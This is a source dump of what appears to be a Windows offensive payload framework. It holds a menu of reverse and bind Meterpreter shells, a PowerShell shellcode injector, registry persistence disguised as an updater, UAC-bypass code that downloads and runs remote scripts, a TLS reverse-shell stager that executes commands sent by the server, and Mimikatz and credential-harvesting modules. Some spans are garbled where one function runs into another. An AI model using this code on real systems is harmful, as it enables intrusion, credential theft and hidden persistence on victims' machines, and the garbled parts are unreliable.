            ["←","↖","↑","↗","→","↘","↓","↙"],
            ["◢","◣","◤","◥"]
        ]
        self.loading = list(text)
        self.randomchoice = random.choice(self.spinner)
        self.spin_1 = len(self.randomchoice)
        self.spin_2 = len(self.loading) + 1
        self.x = 0

    def Looper(self, text):
        print t.bold_green,
        sys.stdout.write('\r')
        sys.stdout.write(text)
        print t.normal,
        sys.stdout.flush()

    def Update(self):
        self.spin_2mod = self.x % self.spin_2
        self.Looper(self.randomchoice[self.x % self.spin_1] + " " + "".join(
            self.loading[0: (self.spin_2mod)]) + (" " * (self.spin_2 - self.spin_2mod)))
        self.x += 1

--------------------------------------------------------------------------------
/lib/menu.py:
--------------------------------------------------------------------------------
from __future__ import unicode_literals
from main import *
from payloadextras import *
from startmetasploit import *
from generatepayload import *
from preparepayload import *
from stager import *
from help import *

class promptComplete(prompt_toolkit.completion.Completer):
    def __init__(self, choices):
        super(promptComplete, self).__init__()
        self.choices = choices

    def get_completions(self, document, complete_event):
        return [prompt_toolkit.completion.Completion(x, start_position=-document.cursor_position) for x in self.choices if x.startswith(document.text)]


def menuRaise():
    raise KeyboardInterrupt

def noColourLen(colourString):
    return len(re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]').sub('', colourString))

def noColourCenter(colourString):
    len = (t.width / 2) - (noColourLen(colourString) /2 )
    if len % 2 > 0:
        len -= 1
    return (' ' * len) + colourString

def getAndRunPSMenu():
    if len(clientMenuOptions) > 2:
        psMenu = MenuOptions(psMenuOptions, menuName="PS Menu")
        psMenu.runmenu()
    else:
        print t.bold_red + "[!] Clients are needed to access this menu" + t.normal
    return False

def getAndRunClientMenu():
    clientMenu = MenuOptions(clientMenuOptions, menuName="Client Menu")
    clientMenu.runmenu()
    return False

def getAndRunMainMenu():
    mainMenu = MenuOptions(mainMenuOptions, menuName="Main Menu")
    mainMenu.runmenu()
    return False

def returnText(colour, text):
    print colour + text + t.normal

mainMenuOptions = OrderedDict([
    ('1', {'payloadchoice': SHELLCODE.windows_rev_shell, 'payload': 'Windows_Reverse_Shell', 'extrawork': reversePayloadGeneration, 'availablemodules': None, 'params': None}),
    ('2', {'payloadchoice': SHELLCODE.windows_met_rev_shell, 'payload': 'Windows_Meterpreter_Reverse_Shell', 'extrawork': reversePayloadGeneration, 'availablemodules': METASPLOIT_Functions['reverse'], 'params': None}),
    ('3', {'payloadchoice': SHELLCODE.windows_met_bind_shell, 'payload': 'Windows_Meterpreter_Bind_Shell', 'extrawork': bindPayloadGeneration, 'availablemodules': METASPLOIT_Functions['bind'], 'params': None}),
    ('4', {'payloadchoice': SHELLCODE.windows_met_rev_https_shell, 'payload': 'Windows_Meterpreter_Reverse_HTTPS', 'extrawork': httpsPayloadGeneration, 'availablemodules': METASPLOIT_Functions['https'], 'params': None}),
    ('5', {'payloadchoice': SHELLCODE.windows_met_rev_shell_dns, 'payload': 'Windows_Meterpreter_Reverse_Dns', 'extrawork': dnsPayloadGeneration, 'availablemodules': METASPLOIT_Functions['dns'], 'params': None}),
    ('ps', {'payloadchoice': None, 'payload': 'PowerShell Menu', 'extrawork': getAndRunPSMenu, 'params': None}),
    ('stager', {'payloadchoice': None, 'payload': 'Powershell Stager', 'extrawork': printListener, 'params': None}),
    ('clients', {'payloadchoice': None, 'payload': 'Stager Connected Clients', 'extrawork': getAndRunClientMenu, 'params': None, 'spacer': True}),
    ('?', {'payloadchoice': None, 'payload': 'Print Detailed Help', 'extrawork': winpayloads_help, 'params': None}),
    ('back', {'payloadchoice': None, 'payload': 'Main Menu', 'extrawork': getAndRunMainMenu, 'params': None}),
    ('exit', {'payloadchoice': None, 'payload': 'Exit', 'extrawork': menuRaise, 'params': None}),
])

psMenuOptions = OrderedDict([
    ('1', {'payloadchoice': None, 'payload': 'Screen_Watch', 'extrawork': returnText , 'params': (t.bold_red, 'Module is borked...')}),
    ('2', {'payloadchoice': SHELLCODE.windows_ps_ask_creds_tcp, 'payload': 'Asks_Creds', 'extrawork': reversePowerShellAskCredsGeneration, 'params': None}),
    ('3', {'payloadchoice': SHELLCODE.windows_invoke_mimikatz, 'payload': 'Invoke_Mimikatz', 'extrawork': reversePowerShellInvokeMimikatzGeneration, 'params': None}),
    #('4', {'payloadchoice': SHELLCODE.windows_invoke_mimikatz, 'payload': 'UAC_Bypass', 'extrawork': reversePowerShellInvokeMimikatzGeneration, 'params': None}),
    ('clients', {'payloadchoice': None, 'payload': 'Connected Interpreter Clients', 'extrawork': getAndRunClientMenu, 'params': None}),
    ('back', {'payloadchoice': None, 'payload': 'Main Menu', 'extrawork': getAndRunMainMenu, 'params': None}),
])

clientMenuOptions = OrderedDict([
    ('back', {'payloadchoice': None, 'payload': 'Main Menu', 'extrawork': getAndRunMainMenu, 'params': None}),
    ('r', {'payloadchoice': None, 'payload': 'Refresh', 'extrawork': getAndRunClientMenu, 'params': None}),
])


class MenuOptions(object):
    def __init__(self, choices, menuName):
        self.choices = choices
        self.menuName = menuName
        self.style = prompt_toolkit.styles.style_from_dict({
            prompt_toolkit.token.Token: '#FFCC66'
        })

    def _choose(self, n):
        if self.choices.has_key(n):
            return (True, self.choices[n]['payloadchoice'], self.choices[n]['payload'], self.choices[n]['extrawork'], self.choices[n]['params'])
        else:
            if not n == "":
                print t.bold_red + '[*] Wrong Selection' + t.normal
            return (False, None, None, None, None)

    def runmenu(self):
        self.printMenues(True)
        while True:
            user_choice = prompt_toolkit.prompt('%s > '%(self.menuName),style=self.style, patch_stdout=True, completer=promptComplete(self.choices)).rstrip(' ')
            success, payloadchoice, payload, extrawork, params = self._choose(user_choice)

            if not success:
                continue
            if extrawork:
                if payloadchoice:
                    result = extrawork(payloadchoice,payload)
                elif params:
                    result = extrawork(*params)
                else:
                    result = extrawork()
            if result == "noclear":
                self.printMenues(False)
            if result == "clear":
                self.printMenues(True)
            if result == "pass":
                pass

    def printMenues(self,toClear):
        Splash(toClear)
        if t.width % 2 > 0:
            adjust = 0
        else:
            adjust = -1
        print t.bold_black + '=' * (t.width / 2 - (len(self.menuName) / 2)) + t.yellow + self.menuName + t.bold_black + '=' * (t.width / 2 - ((len(self.menuName) / 2)- adjust))
        maxlen = 0
        arr = []
        for i in self.choices.iterkeys():
            menuPrintString = t.bold_yellow + str(i) + ': ' + t.normal + str(self.choices[i]['payload']).replace('_',' ')
            if 'availablemodules' in self.choices[i].keys() and self.choices[i]['availablemodules']:
                menuPrintString += t.bold_green + ' ' + str(self.choices[i]['availablemodules'].keys()).replace('\'','').replace('normal, ','') + t.normal
            if 'spacer' in self.choices[i]:
                menuPrintString += '\n'

            nocolourlen = noColourLen(menuPrintString)
            if nocolourlen > maxlen:
                maxlen = nocolourlen
            arr.append(menuPrintString)
        for i in arr:
            spacing = (t.width / 2) - (maxlen / 2)
            if spacing % 2 > 0:
                spacing -= 1
            if len(i) % 2 > 0:
                adjust = 0
            else:
                adjust = 1
            print (' '* spacing) + i + (' ' * (spacing - adjust))
        print t.bold_black + '='*t.width + t.normal

def Splash(toClear):
    if toClear:
        print t.clear
    print t.bold_red
    print noColourCenter("_ ___ ____ __ __")
    print noColourCenter(" | | / (_)___ / __ \____ ___ __/ /___ ____ _____/ /____")
    print noColourCenter(" | | /| / / / __ \/ /_/ / __ `/ / / / / __ \/ __ `/ __ / ___/")
    print noColourCenter(" | |/ |/ / / / / / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ (__ )")
    print noColourCenter(" |__/|__/_/_/ /_/_/ \__,_/\__, /_/\____/\__,_/\__,_/____/")
    print noColourCenter(" /____/NCCGroup - CharlieDean" + t.normal)

--------------------------------------------------------------------------------
/lib/payloadextras.py:
--------------------------------------------------------------------------------
import base64
import re
from main import *

class EXTRAS(object):
    def __init__(self,shellcode):
        self.ez2read_shellcode = ''
        for byte in shellcode:
            self.ez2read_shellcode += '\\x%s' % byte.encode('hex')

        self.injectshellcode_layout = FUNCTIONS().powershellShellcodeLayout(self.ez2read_shellcode).rstrip(',')
        self.injectshellcode_sleep = """Start-Sleep -s 60;$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % (
            self.injectshellcode_layout)
        self.injectshellcode_nosleep = """$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % (
            self.injectshellcode_layout)

    def PERSISTENCE(self):
        with open('persist.ps1', 'w') as persistfile:
            persistfile.write("echo \"%s\" | out-file $env:USERPROFILE/update.txt;New-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name Updater -PropertyType String -Value 'C:\\Windows\\System32\WindowsPowerShell\\v1.0\\powershell.exe -c \"powershell -exec bypass -NonInteractive -WindowStyle Hidden -enc (Get-Content $env:USERPROFILE\update.txt)\"'" % base64.b64encode(self.injectshellcode_sleep.encode('utf_16_le')))
            persistfile.close()
        with open('persist.rc', 'w') as persistfilerc:
            persistfilerc.write("""run post/windows/manage/exec_powershell SCRIPT=persist.ps1 SESSION=1""")
            persistfilerc.close()
        return self.ez2read_shellcode

    def UACBYPASS(self, version):
        randomPort = FUNCTIONS().randomUnusedPort()
        uacbypassrcfilecontents = """run post/windows/manage/exec_powershell SCRIPT="IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/stage.ps1')" SESSION=1"""% (FUNCTIONS().CheckInternet(), randomPort)
        if version == "7":
            uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("https://github.com/PowerShellEmpire/Empire/raw/master/data/module_source/privesc/Invoke-BypassUAC.ps1");\nInvoke-BypassUAC -Command \"powershell -enc %s\" """ % (
                base64.b64encode(self.injectshellcode_nosleep.encode('utf_16_le')))
            a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode, args=(uacbypassfilecontent, randomPort))
            a.daemon = True
            a.start()
        elif version == "10":
            uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Charliedean/Invoke-SilentCleanUpBypass/master/Invoke-SilentCleanUpBypass.ps1");\nInvoke-SilentCleanUpBypass -Command \"cmd /c powershell -WindowStyle Hidden -enc %s && REM\" """ % (
                base64.b64encode(self.injectshellcode_nosleep.encode('utf_16_le')))
            a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode, args=(uacbypassfilecontent, randomPort))
            a.daemon = True
            a.start()
        with open('uacbypass.rc', 'w') as uacbypassfilerc:
            uacbypassfilerc.write(uacbypassrcfilecontents)
            uacbypassfilerc.close()
        return self.ez2read_shellcode

    def ALLCHECKS(self):
        with open('allchecks.ps1', 'w') as allchecksfile:
            allchecksfile.write(
                """IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1");invoke-allchecks""")
            allchecksfile.close()
        return self.ez2read_shellcode

    def RETURN_EZ2READ_SHELLCODE(self):
        return self.ez2read_shellcode

--------------------------------------------------------------------------------
/lib/powershell/stager.ps1:
--------------------------------------------------------------------------------
#$ErrorActionPreference = 'SilentlyContinue'
$byteAmount = New-Object Byte[] 10500
$Base64Cert = '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'
$CertPassword = 'password'
$isbind = $%s

Function Exec-Process ($execPath, $execArgs) {
    if ($execPath -eq 'powershell') {
        $execPath = (Get-Command powershell.exe).Definition
    }
    $pinfo = New-Object System.Diagnostics.ProcessStartInfo
    $pinfo.FileName = $execPath
    $pinfo.RedirectStandardError = $true
    $pinfo.RedirectStandardOutput = $true
    $pinfo.UseShellExecute = $false
    $pinfo.Arguments = $execArgs
    $p = New-Object System.Diagnostics.Process
    $p.StartInfo = $pinfo
    $p.Start() | Out-Null
    [pscustomobject]@{
        stdout = $p.StandardOutput.ReadToEnd()
        stderr = $p.StandardError.ReadToEnd()
        exitcode = $p.ExitCode
    }
    $p.WaitForExit()
}

Function Connect-Server ($ip, $port) {
    $connectionTrys = 10
    if (!$isbind) {
        while($connectionTrys -gt 0) {
            try{
                $Socket = New-Object System.Net.Sockets.TCPClient($ip,$port)
                if ($Socket.Connected) {
                    break
                }
            } catch {
                $connectionTrys = $connectionTrys - 1
                Start-Sleep -s 1
            }
        }
    } else {
        $SSLcertfake = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2([System.Convert]::FromBase64String($Base64Cert), $CertPassword)
        $listener = [System.Net.Sockets.TcpListener]$port
        $listener.start()
        $Socket = $listener.AcceptTcpClient()
    }

    if ($Socket.Connected) {
        $sslSocket = New-Object System.Net.Security.SslStream $Socket.GetStream(), $false, ({$True} -as [Net.Security.RemoteCertificateValidationCallback])
        if (!$isbind)
        {
            $sslSocket.AuthenticateAsClient($env:computername)
        } else {
            $sslSocket.AuthenticateAsServer($SSLcertfake, $false, [System.Security.Authentication.SslProtocols]::Tls, $false)
        }



        if ((New-Object Security.Principal.WindowsPrincipal ([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)) {
            $isAdmin = "True"
        } else {
            $isAdmin = "False"
        }
        $userandPriv = "`0" + "`0" + "[#check#]" + $env:computername + ":" + $isAdmin
        $sendUserandPriv = ([text.encoding]::ASCII).GetBytes($userandPriv, 0, $userandPriv.Length)
        $sslSocket.Write($sendUserandPriv)
        $Connected = $True
    }
    else {
        $Connected = $False
    }
    [pscustomobject]@{
        Connected = $Connected
        Socket = $Socket
        Client = $sslSocket
    }
}


$Client = Connect-Server -ip '%s' -port '%s'

if ($Client.Connected) {
    while ($True) {

        $error.clear()
        $serverData = $Client.Client.Read($byteAmount, 0, $byteAmount.Length)
        $asciiData = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($byteAmount, 0, $serverData)
        try {
            $type = ($asciiData | ConvertFrom-Json).type
            $b64Data = ($asciiData | ConvertFrom-Json).data
            $sendoutput = ($asciiData | ConvertFrom-Json).sendoutput
            $multiple = ($asciiData | ConvertFrom-Json).multiple
            $data = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64Data))
$extra = ($asciiData | ConvertFrom-Json).extra 96 | } catch { 97 | continue 98 | } 99 | 100 | if ($serverData -lt 1) { 101 | exit 102 | } 103 | 104 | if ($type -eq 'exec') { 105 | $sendtoServer = (iex -c $data 2>&1 | Out-String) 106 | if ($error[0]) { 107 | $sendtoServer = ($error[0] | Out-String) 108 | } 109 | if ($sendtoServer.Length -lt 1) { 110 | $sendtoServer = "`0" 111 | } 112 | } 113 | 114 | #if ($type -eq 'uacbypass') { 115 | 116 | 117 | #} 118 | 119 | if ($type -eq 'script') { 120 | $process = Exec-Process -execPath 'powershell' -execArgs ('-c ' + $data) 121 | if ($process.exitcode -eq 0) { 122 | $sendtoServer = $process.stdout 123 | } 124 | else { 125 | $sendtoServer = $process.stderr 126 | } 127 | } 128 | 129 | if ($multiple -eq 'true') { 130 | $multiplescript += $data 131 | } 132 | 133 | if ($multiple -eq 'exec') { 134 | IEX -c $multiplescript 2>&1 | Out-String 135 | $multiplescript = "" 136 | } 137 | 138 | if ($sendoutput -eq 'true') { 139 | $asciiBytes = ([text.encoding]::ASCII).GetBytes($sendtoServer, 0, $sendtoServer.Length) 140 | $Client.Client.Write($asciiBytes) 141 | $Client.Client.Flush() 142 | } 143 | } 144 | } 145 | -------------------------------------------------------------------------------- /lib/preparepayload.py: -------------------------------------------------------------------------------- 1 | from main import * 2 | from payloadextras import * 3 | from startmetasploit import * 4 | from generatepayload import * 5 | 6 | def checkClientUpload(payloadname, powershellExec, isExe): 7 | from menu import clientMenuOptions 8 | if len(clientMenuOptions.keys()) > 2: 9 | return DoClientUpload(payloaddir(),payloadname,powershellExec,isExe) 10 | else: 11 | print powershellExec 12 | 13 | def reverseIpAndPort(port): 14 | portnum = raw_input( 15 | '\n[*] Press Enter For Default Port(%s)\n[*] Port> '%(t.bold_green + port + t.normal)) 16 | if len(portnum) is 0: 17 | portnum = port 18 | IP = FUNCTIONS().CheckInternet() 19 | ipaddr = raw_input( 20 | 
        '\n[*] Press Enter To Get Local Ip Automatically(%s)\n[*] IP> '%(t.bold_green + IP + t.normal))
    if len(ipaddr) == 0:
        ipaddr = IP
    if not IP:
        print t.bold_red + 'Error Getting Ip Automatically' + t.normal
        ipaddr = raw_input(
            '\n[*] Please Enter Your IP Manually(Automatic Disabled)\n[*] IP> ')
    return (portnum,ipaddr)

def reversePayloadGeneration(payloadchoice,payloadname):
    portnum,ipaddr = reverseIpAndPort('4444')
    try:
        ip1, ip2, ip3, ip4 = ipaddr.split('.')
        iphex = struct.pack('BBBB', int(ip1), int(ip2), int(ip3), int(ip4))
    except Exception as E:
        print E
        print t.bold_red + '[*] Error in IP Syntax'
        sys.exit(1)
    try:
        porthex = struct.pack('>h', int(portnum))
    except:
        print t.bold_red + '[*] Error in Port Syntax'
        sys.exit(1)
    shellcode = payloadchoice % (iphex, porthex)
    print t.bold_green + '[*] IP SET AS %s\n[*] PORT SET AS %s\n' % (ipaddr, portnum) + t.normal
    if payloadname == "Windows_Reverse_Shell":
        ez2read_shellcode, startRevMetasploit = askAndReturnModules(shellcode,'nclistener')
    else:
        ez2read_shellcode, startRevMetasploit = askAndReturnModules(shellcode,'reverse')
    GeneratePayload(ez2read_shellcode,payloadname,shellcode)
    startRevMetasploit(portnum)
    return "clear"

def bindPayloadGeneration(payloadchoice,payloadname):
    bindport = raw_input(
        '\n[*] Press Enter For Default Bind Port(%s)\n[*] Port> '%(t.bold_green + '4444' + t.normal))
    if len(bindport) == 0:
        bindport = 4444
    try:
        bindporthex = struct.pack('>h', int(bindport))
    except:
        print t.bold_red + '[!] Error in Port Syntax' + t.normal
        sys.exit(1)
    shellcode = payloadchoice % (bindporthex)
    bindip = raw_input(
        '\n[*] Target Bind IP Address ' + t.bold_red + '(REQUIRED FOR BIND PAYLOADS)' + t.normal +' \n[*] IP> ')
    print t.bold_green + '[*] BIND IP SET AS %s\n[*] PORT SET AS %s\n' % (bindip,bindport) + t.normal
    ez2read_shellcode, startBindMetasploit = askAndReturnModules(shellcode,'bind')
    GeneratePayload(ez2read_shellcode,payloadname,shellcode)
    startBindMetasploit(bindport,bindip)
    return "clear"

def httpsPayloadGeneration(payloadchoice,payloadname):
    portnum,ipaddr = reverseIpAndPort('443')
    try:
        porthex = struct.pack(' '%(t.bold_green + '4444' + t.normal))
    if len(portnum) == 0:
        portnum = 4444
    try:
        porthex = struct.pack('>h', int(portnum))
    except:
        print t.bold_red + '[*] Error in Port Syntax'
        sys.exit(1)
    while True:
        DNSaddr = raw_input(
            '\n[*] Please Enter DNS Hostname\n[*] DNS> ')
        if DNSaddr:
            break
    shellcode = payloadchoice % (DNSaddr,porthex)
    print t.bold_green + '[*] DNS HOSTNAME SET AS %s\n[*] PORT SET AS %s\n' % (DNSaddr, portnum) + t.normal
    ez2read_shellcode, startDnsMetasploit = askAndReturnModules(shellcode,'dns')
    GeneratePayload(ez2read_shellcode,payloadname,shellcode)
    startDnsMetasploit(portnum,DNSaddr)
    return "clear"

def reversePowerShellWatchScreenGeneration(payloadchoice,payloadname):
    portnum,ipaddr = reverseIpAndPort('4444')
    shellcode = payloadchoice % (ipaddr,portnum)
    powershellExec = 'powershell.exe -WindowStyle Hidden -enc %s'%(base64.b64encode(shellcode.encode('utf_16_le')))
    print t.bold_green + '\n[*] Powershell Has Been Generated' + t.normal
    checkClientUpload(payloadname,powershellExec,isExe=False)
    from listener import Server
    listenerserver = Server('0.0.0.0', int(portnum), bindsocket=True)
    relayserver = Server('127.0.0.1', 8081, relay=True)
    os.system('firefox 127.0.0.1:8081')
    print 'waiting for connection...\nCTRL + C when done\n'
    try:
        while not listenerserver.handlers:
            time.sleep(0.5)
        while listenerserver:
            if listenerserver.handlers[1].in_buffer:
                relayserver.handlers[1].out_buffer.append(listenerserver.handlers[1].in_buffer.pop())
    except KeyboardInterrupt:
        if listenerserver.handlers:
            listenerserver.handlers[1].handle_close()
    return "pass"

def reversePowerShellAskCredsGeneration(payloadchoice,payloadname):
    json = '{"type":"script", "data":"%s", "sendoutput":"true", "multiple":"false"}'% (base64.b64encode(payloadchoice.encode('utf_16_le')))
    clientnumber = int(checkClientUpload(payloadname,json,isExe=False))
    from stager import returnServerList
    try:
        for server in returnServerList():
            while True:
                if server.handlers[clientnumber].in_buffer:
                    print server.handlers[clientnumber].in_buffer.pop()
                    break
                else:
                    time.sleep(0.1)
    except KeyboardInterrupt:
        pass
    return "pass"

def reversePowerShellInvokeMimikatzGeneration(payloadchoice,payloadname):
    json = '{"type":"script", "data":"%s", "sendoutput":"true"}'% (base64.b64encode(payloadchoice.encode('utf_16_le')))
    clientnumber = int(checkClientUpload(payloadname,json,isExe=False))
    from stager import returnServerList
    try:
        for server in returnServerList():
            while True:
                if server.handlers[clientnumber].in_buffer:
                    print server.handlers[clientnumber].in_buffer.pop()
                    break
                else:
                    time.sleep(0.1)
    except KeyboardInterrupt:
        pass
    return "pass"

def UACBypassGeneration(payloadchoice,payloadname):
    win7orwin10 = raw_input(t.bold_red + '[*] Windows 7 or 10?' + t.bold_red + ' 7/[10]:' + t.normal)
    if not win7orwin10:
        win7orwin10 = "10"
    if win7orwin10 == "7":
        json = '{"type":"uacbypass", "data":"%s", "sendoutput":"true"}'% (base64.b64encode(payloadchoice.encode('utf_16_le')))
    else:
        json = '{"type":"uacbypass", "data":"%s", "sendoutput":"true"}'% (base64.b64encode(payloadchoice.encode('utf_16_le')))
    clientnumber = int(checkClientUpload(payloadname,json,isExe=False))
    from stager import returnServerList
    try:
        for server in returnServerList():
            while True:
                if server.handlers[clientnumber].in_buffer:
                    print server.handlers[clientnumber].in_buffer.pop()
                    break
                else:
                    time.sleep(0.1)
    except KeyboardInterrupt:
        pass
    return "pass"

--------------------------------------------------------------------------------
/lib/psexec.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom)
#
# Author:
#  beto (@agsolino)
#
# Reference for:
#  DCE/RPC and SMB.

import sys
import os
import cmd
import logging
from threading import Thread, Lock
import argparse
import random
import string
import time

from impacket.examples import logger
from impacket import version, smb
from impacket.smbconnection import SMBConnection
from impacket.dcerpc.v5 import transport
from impacket.structure import Structure
from impacket.examples import remcomsvc, serviceinstall


class RemComMessage(Structure):
    structure = (
        ('Command','4096s=""'),
        ('WorkingDir','260s=""'),
        ('Priority',' 0:
            try:
                s.waitNamedPipe(tid,pipe)
                pipeReady = True
            except:
                tries -= 1
                time.sleep(2)
                pass

        if tries == 0:
            logging.critical('Pipe not ready, aborting')
            raise

        fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)

        return fid

    def doStuff(self, rpctransport):

        dce = rpctransport.get_dce_rpc()
        try:
            dce.connect()
        except Exception, e:
            logging.critical(str(e))
            sys.exit(1)

        global dialect
        dialect = rpctransport.get_smb_connection().getDialect()

        try:
            unInstalled = False
            s = rpctransport.get_smb_connection()

            # We don't wanna deal with timeouts from now on.
            s.setTimeout(100000)
            if self.__exeFile is None:
                installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())
            else:
                try:
                    f = open(self.__exeFile)
                except Exception, e:
                    logging.critical(str(e))
                    sys.exit(1)
                installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f)

            installService.install()

            if self.__exeFile is not None:
                f.close()

            # Check if we need to copy a file for execution
            if self.__copyFile is not None:
                installService.copy_file(self.__copyFile, installService.getShare(), os.path.basename(self.__copyFile))
                # And we change the command to be executed to this filename
                self.__command = os.path.basename(self.__copyFile) + ' ' + self.__command

            tid = s.connectTree('IPC$')
            fid_main = self.openPipe(s,tid,'\RemCom_communicaton',0x12019f)

            packet = RemComMessage()
            pid = os.getpid()

            packet['Machine'] = ''.join([random.choice(string.letters) for _ in range(4)])
            if self.__path is not None:
                packet['WorkingDir'] = self.__path
            packet['Command'] = self.__command
            packet['ProcessID'] = pid

            s.writeNamedPipe(tid, fid_main, str(packet))

            # Here we'll store the command we type so we don't print it back ;)
            # ( I know.. globals are nasty :P )
            global LastDataSent
            LastDataSent = ''

            # Create the pipes threads
            stdin_pipe = RemoteStdInPipe(rpctransport,'\%s%s%d' % (RemComSTDIN ,packet['Machine'],packet['ProcessID']), smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare() )
            stdin_pipe.start()
            stdout_pipe = RemoteStdOutPipe(rpctransport,'\%s%s%d' % (RemComSTDOUT,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA )
            stdout_pipe.start()
            stderr_pipe = RemoteStdErrPipe(rpctransport,'\%s%s%d' % (RemComSTDERR,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA )
            stderr_pipe.start()

            # And we stay here till the end
            ans = s.readNamedPipe(tid,fid_main,8)

            if len(ans):
                retCode = RemComResponse(ans)
                logging.info("Process %s finished with ErrorCode: %d, ReturnCode: %d" % (self.__command, retCode['ErrorCode'], retCode['ReturnCode']))
                installService.uninstall()
                if self.__copyFile is not None:
                    # We copied a file for execution, let's remove it
                    s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
                unInstalled = True
                sys.exit(retCode['ErrorCode'])

        except SystemExit:
            raise
        except:
            if unInstalled is False:
                print "[*] Sleeping While MeterPreter Migrates"
                time.sleep(10)
                installService.uninstall()
                if self.__copyFile is not None:
                    s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
            sys.stdout.flush()
            sys.exit(1)

class Pipes(Thread):
    def __init__(self, transport, pipe, permissions, share=None):
        Thread.__init__(self)
        self.server = 0
        self.transport = transport
        self.credentials = transport.get_credentials()
        self.tid = 0
        self.fid = 0
        self.share = share
        self.port = transport.get_dport()
        self.pipe = pipe
        self.permissions = permissions
        self.daemon = True

    def connectPipe(self):
        try:
            lock.acquire()
            global dialect
            #self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
            self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = dialect)
            user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
            if self.transport.get_kerberos() is True:
                self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
            else:
                self.server.login(user, passwd, domain, lm, nt)
            lock.release()
            self.tid = self.server.connectTree('IPC$')

            self.server.waitNamedPipe(self.tid, self.pipe)
            self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)
            self.server.setTimeout(1000000)
        except:
            logging.error("Something went wrong connecting the pipes(%s), try again" % self.__class__)


class RemoteStdOutPipe(Pipes):
    def __init__(self, transport, pipe, permissions):
        Pipes.__init__(self, transport, pipe, permissions)

    def run(self):
        self.connectPipe()
        while True:
            try:
                ans = self.server.readFile(self.tid,self.fid, 0, 1024)
            except:
                pass
            else:
                try:
                    global LastDataSent
                    if ans != LastDataSent:
                        sys.stdout.write(ans.decode('cp437'))
                        sys.stdout.flush()
                    else:
                        # Don't echo what I sent, and clear it up
                        LastDataSent = ''
                    # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars,
                    # it will give false positives tho.. we should find a better way to handle this.
                    # LastDataSent is a string, so compare its length (the original compared the string itself to 10)
                    if len(LastDataSent) > 10:
                        LastDataSent = ''
                except:
                    pass

class RemoteStdErrPipe(Pipes):
    def __init__(self, transport, pipe, permissions):
        Pipes.__init__(self, transport, pipe, permissions)

    def run(self):
        self.connectPipe()
        while True:
